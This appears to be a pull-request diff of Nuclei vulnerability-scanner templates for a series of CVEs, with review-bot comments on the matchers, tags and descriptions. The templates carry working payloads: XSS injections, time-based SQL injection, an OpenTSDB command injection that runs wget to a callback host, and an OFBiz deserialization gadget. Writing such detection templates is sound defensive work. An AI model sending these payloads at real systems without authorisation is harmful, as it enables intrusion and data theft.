- https://github.com/grafana/grafana/pull/23254
|
||||
- https://security.netapp.com/advisory/ntap-20200810-0002/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
|
||||
- https://hackerone.com/reports/1329433
|
||||
remediation: This issue can be resolved by updating Grafana to the latest version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
@ -18,7 +19,8 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: title:"Grafana"
|
||||
tags: cve,cve2020,xss,grafana
|
||||
tags: cve,cve2020,xss,grafana,hackerone
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -5,6 +5,9 @@ info:
|
|||
author: x6263
|
||||
severity: medium
|
||||
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"prtg"
|
||||
reference:
|
||||
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
|
||||
|
@ -21,7 +24,9 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/public/login.htm?type=probes"
|
||||
- "{{BaseURL}}/public/login.htm?type=requests"
|
||||
- "{{BaseURL}}/public/login.htm?type=treestat"
|
||||
|
||||
stop-at-first-match: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -33,6 +38,9 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "prtg_network_monitor"
|
||||
- "Probes"
|
||||
- "Groups"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
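Review bot: `verified: true` is added unquoted here while the other metadata blocks in this commit (CVE-2017-14186, CVE-2018-17422, CVE-2020-23697, CVE-2021-20323) use `verified: "true"`; pick one form, since the string form is what the rest of the commit standardises on. `req-condition: true` is added but no matcher references a per-request field such as `body_1` or `status_code_2`, so it appears to have no effect next to `stop-at-first-match: true`; drop it or add the DSL matcher it was meant for. `Groups` is a generic token and, under `condition: or`, satisfies the matcher on its own, so a page that does not expose probe data but mentions groups would match; if the intent is the PRTG marker plus one of the leaked sections, that needs two matchers.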
@ -15,7 +15,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,cockpit,agentejo,xss,oss
|
||||
tags: cve,cve2020,cockpit,agentejo,xss,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/hitIer/web_test/tree/master/hotel
|
||||
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
|
||||
|
@ -35,3 +35,5 @@ requests:
|
|||
- 'status_code == 200'
|
||||
- 'contains(body, "Hotel Booking System")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -0,0 +1,65 @@
|
|||
id: CVE-2020-23697
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.
|
||||
reference:
|
||||
- https://github.com/monstra-cms/monstra/issues/463
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-23697
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2020-23697
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated
|
||||
|
||||
variables:
|
||||
string: "{{to_lower('{{randstr}}')}}"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/index.php?id=dashboard HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login={{username}}&password={{password}}&login_submit=Log+In
|
||||
|
||||
- |
|
||||
GET /admin/index.php?id=pages&action=add_page HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- |
|
||||
POST /admin/index.php?id=pages&action=add_page HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15
|
||||
|
||||
- |
|
||||
GET /{{string}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_4, "text/html")'
|
||||
- 'status_code_4 == 200'
|
||||
- 'contains(body_4, "><script>alert(document.domain)</script>") && contains(body_4, "Monstra")'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'id="csrf" name="csrf" value="(.*)">'
|
||||
internal: true
|
|
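Review bot: `{{username}}` and `{{password}}` in the login POST are not declared in the `variables:` block, so the template only runs when both are supplied on the command line; document that in a comment above `requests:`, e.g. `# requires admin credentials: -var username=<user> -var password=<pass>`, since `authenticated` in the tags is the only hint. The csrf regex `value="(.*)">` is greedy and can overrun the token when other `">` text follows on the same line; `value="([^"]*)"` is safer. `vulnerabilty` in the description is a typo for `vulnerability`.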
@ -1,11 +1,11 @@
|
|||
id: CVE-2020-24902
|
||||
|
||||
info:
|
||||
name: Quixplorer <=2.4.1 - Cross Site Scripting
|
||||
name: Quixplorer <=2.4.1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||||
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
|
||||
|
@ -44,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2020-24903
|
||||
|
||||
info:
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross Site Scripting
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||||
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://seclists.org/bugtraq/2016/Mar/104
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
||||
|
@ -17,7 +17,7 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.component:"ASP.NET"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,cuteeditor,xss,seclists
|
||||
tags: cve,cve2020,cuteeditor,xss,seclists
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
id: CVE-2020-26248
|
||||
|
||||
info:
|
||||
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
|
||||
name: PrestaShop Product Comments <4.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
|
||||
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
- https://packagist.org/packages/prestashop/productcomments
|
||||
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
remediation: Fixed in 4.2.1.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
|
||||
cvss-score: 8.2
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2020-29284
|
||||
|
||||
info:
|
||||
name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -4,38 +4,43 @@ info:
|
|||
name: OpenTSDB <= 2.4.0 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
|
||||
description: |
|
||||
OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
|
||||
reference:
|
||||
- https://github.com/OpenTSDB/opentsdb/issues/2051
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
|
||||
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-35476
|
||||
cwe-id: CWE-78
|
||||
tags: cve,cve2020,opentsdb,rce
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"OpenTSDB"
|
||||
tags: cve,cve2020,opentsdb,rce,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
|
||||
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- plotted
|
||||
- timing
|
||||
- cachehit
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/04/28
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
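Review bot: The yrange payload now calls `wget http://{{interactsh-url}}`, but no matcher checks the interactsh interaction — the matchers still require only the body words `plotted`, `timing`, `cachehit` and a 200, which are presumably returned for any well-formed `/q` request whether or not the `system()` call ran. Add an `interactsh_protocol` matcher so the finding is backed by the out-of-band callback rather than by the JSON envelope; the word, header and status matchers can stay as fingerprinting. `verified: true` is also unquoted here while the other sections in this commit use `verified: "true"`.
```yaml
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # confirms the injected command actually executed
        words:
          - "http"
      # … unchanged: body word matcher, header matcher, status matcher …
```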
@ -0,0 +1,56 @@
|
|||
id: CVE-2021-20323
|
||||
|
||||
info:
|
||||
name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting
|
||||
author: ndmalc
|
||||
severity: medium
|
||||
description: |
|
||||
Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.
|
||||
reference:
|
||||
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
|
||||
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
|
||||
- https://access.redhat.com/security/cve/CVE-2021-20323
|
||||
- https://github.com/ndmalc/CVE-2021-20323
|
||||
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-20323
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: html:"Keycloak"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,keycloak,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
|
||||
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
||||
|
||||
# Enhanced by md on 2023/01/06
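Review bot: The description has a typo in the content type, `'Content-Type' of text/hml`, which should read `text/html` — the same value the header matcher below checks, so the text currently contradicts the matcher. The closing sentence about the `application/json` POST having no common user-impact path is useful justification for `severity: medium`; keep it. Nothing else in the new file looks off: the reflected-marker body word, the `text/html` header and the 400 status are combined with `matchers-condition: and`, which keeps the check specific.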
@ -1,4 +1,4 @@
|
|||
id: unpatched-coldfusion
|
||||
id: CVE-2021-21087
|
||||
|
||||
info:
|
||||
name: Adobe ColdFusion - Remote Code Execution
|
@ -1,18 +1,15 @@
|
|||
id: CVE-2021-24227
|
||||
|
||||
info:
|
||||
name: Patreon WordPress < 1.7.0 - Unauthenticated Local File Disclosure
|
||||
name: Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: The Jetpack Scan team identified a Local File Disclosure vulnerability
|
||||
in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting
|
||||
the site. Using this attack vector, an attacker could leak important internal
|
||||
files like wp-config.php, which contains database credentials and cryptographic
|
||||
keys used in the generation of nonces and cookies.
|
||||
description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
|
||||
- https://wordpress.org/plugins/patreon-connect/
|
||||
- https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24227
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
@ -34,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
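Review bot: The new name relabels the issue as "Local File Inclusion" while the description in the same hunk still describes file disclosure (leaking `wp-config.php`), and inclusion normally implies the file is executed rather than read; the name and description should agree, e.g. keep `Unauthenticated Local File Disclosure` in the name or state in the description that files are read, not included. The same rename is applied in the TermTalk (CVE-2021-35380), IND780 (CVE-2021-40661) and kkFileview (CVE-2021-43734) sections below, where the templates keep `cwe-id: CWE-22` and `traversal` tags that describe path traversal, so the mismatch repeats there. Separately, the description was collapsed onto one long line, whereas every other template touched by this commit uses a `description: |` block scalar — consider `description: |` followed by the indented sentence. The request and matcher block is outside these hunks.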
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-24827
|
||||
|
||||
info:
|
||||
name: WordPress Asgaros Forum <1.15.13 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
|
||||
- https://wordpress.org/plugins/asgaros-forum/
|
||||
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24827
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "asgarosforum")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
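Review bot: The tags line carries `cve2022` for a 2021 CVE; it should be `tags: cve2021,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli`, which is exactly the correction this commit makes for CVE-2021-35380 further down. Year tags drive `-tags cve2021` style filtering, so as written the template is skipped by year-scoped runs and wrongly picked up by 2022 ones. The `@timeout: 15s` over a 6-second `sleep` and the `contains(body, "asgarosforum")` check give the time-based DSL reasonable headroom and specificity.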
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-24946
|
||||
|
||||
info:
|
||||
name: WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445
|
||||
- https://wordpress.org/plugins/modern-events-calendar-lite/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24946
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24946
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200 || status_code == 500'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
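Review bot: `@timeout: 10s` leaves only 4 seconds of headroom over the 6-second delay the payload requests, so on a slow host the DB sleep plus normal page rendering can exceed the timeout; the response is then dropped and the `duration>=6` DSL never evaluates — a false negative on exactly the hosts that are vulnerable. The Asgaros Forum template added in the same commit uses `@timeout: 15s` for the same 6-second sleep; aligning to `@timeout: 15s` costs nothing on non-vulnerable hosts, which answer immediately. The `status_code == 500 || "been a critical error"` branch presumably covers installations where the injected query errors out after sleeping — worth a short comment, since a 500 alone reads like a broken target.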
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-25099
|
||||
|
||||
info:
|
||||
name: WordPress GiveWP <2.17.3 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
|
||||
- https://wordpress.org/plugins/give/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-25099
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
- 'contains(body, "give_user_login")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
@ -39,21 +39,17 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- "application/x-www-form-urlencoded"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/15
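Review bot: The new body matcher only requires the literal tokens `uid=`, `gid=` and `groups=` to appear somewhere in a 200 `text/html` response, which is far less specific than the structured `uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)` regex it appears to replace — a help page, an echoed parameter or a form that mentions those strings now satisfies all three words. Consider keeping the structured form as a regex matcher alongside the header and status checks: `- type: regex`, `regex:`, `- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'`. The template's `id`, `info` and request block are above this hunk.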
@ -0,0 +1,58 @@
|
|||
id: CVE-2021-30128
|
||||
|
||||
info:
|
||||
name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
|
||||
author: For3stCo1d
|
||||
severity: critical
|
||||
description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version
|
||||
reference:
|
||||
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
|
||||
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
|
||||
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-30128
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
fofa-query: app="Apache_OFBiz"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,apache,ofbiz,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webtools/control/SOAPService HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<ser>
|
||||
<map-Map>
|
||||
<map-Entry>
|
||||
<map-Key>
|
||||
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
|
||||
</map-Key>
|
||||
<map-Value>
|
||||
<std-String/>
|
||||
</map-Value>
|
||||
</map-Entry>
|
||||
</map-Map>
|
||||
</ser>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="errorMessage"'
